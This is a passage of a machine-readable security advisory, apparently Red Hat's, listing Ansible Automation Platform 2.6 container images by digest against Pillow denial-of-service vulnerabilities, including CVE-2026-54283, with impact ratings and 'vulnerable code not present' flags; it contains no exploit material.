"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-54283",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-22T18:01:06.194658+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
